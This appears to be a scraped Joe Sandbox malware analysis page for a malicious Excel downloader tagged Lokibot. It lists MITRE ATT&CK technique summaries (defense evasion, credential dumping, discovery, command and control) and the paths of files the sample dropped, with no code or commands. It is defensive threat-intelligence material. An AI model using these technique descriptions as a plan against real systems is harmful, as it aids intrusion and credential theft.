Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicegirlwithnewthingswhichevennobodknowthatkissingme[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\educationalthingswithgreatattitudeonhere[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1AD36F6.emf

C:\Users\user\AppData\Local\Temp\2whqha0s.5gp.ps1

C:\Users\user\AppData\Local\Temp\RESB606.tmp

C:\Users\user\AppData\Local\Temp\cxpovzpe.jz0.psm1

C:\Users\user\AppData\Local\Temp\hrd142a2.xme.psm1

C:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP

C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.0.cs

C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline

Windows Analysis Report
SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre